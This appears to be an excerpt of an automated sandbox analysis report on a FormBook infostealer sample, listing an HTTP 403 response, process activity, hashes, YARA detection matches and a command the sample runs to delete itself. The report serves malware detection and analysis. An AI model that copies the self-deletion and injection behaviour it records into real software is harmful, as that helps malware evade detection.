                                                                Jul 22, 2021 17:59:53.264167070 CEST8147INHTTP/1.1 403 Forbidden
                                                                Server: openresty
                                                                Date: Thu, 22 Jul 2021 15:59:53 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 275
                                                                ETag: "60ef677e-113"
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Start time:17:57:43
                                                                Start date:22/07/2021
                                                                Path:C:\Users\user\Desktop\85vLO1Rpcy.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\85vLO1Rpcy.exe'
                                                                Imagebase:0x400000
                                                                File size:177038 bytes
                                                                MD5 hash:91663BEE11EC2466C36FF85805041FFF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:17:57:45
                                                                Start date:22/07/2021
                                                                Path:C:\Users\user\Desktop\85vLO1Rpcy.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\85vLO1Rpcy.exe'
                                                                Imagebase:0x400000
                                                                File size:177038 bytes
                                                                MD5 hash:91663BEE11EC2466C36FF85805041FFF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:17:57:51
                                                                Start date:22/07/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Explorer.EXE
                                                                Imagebase:0x7ff6fee60000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:17:58:12
                                                                Start date:22/07/2021
                                                                Path:C:\Windows\SysWOW64\cscript.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                Imagebase:0x310000
                                                                File size:143360 bytes
                                                                MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:moderate

                                                                General

                                                                Start time:17:58:17
                                                                Start date:22/07/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
                                                                Imagebase:0x11d0000
                                                                File size:232960 bytes
                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:17:58:17
                                                                Start date:22/07/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff724c50000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >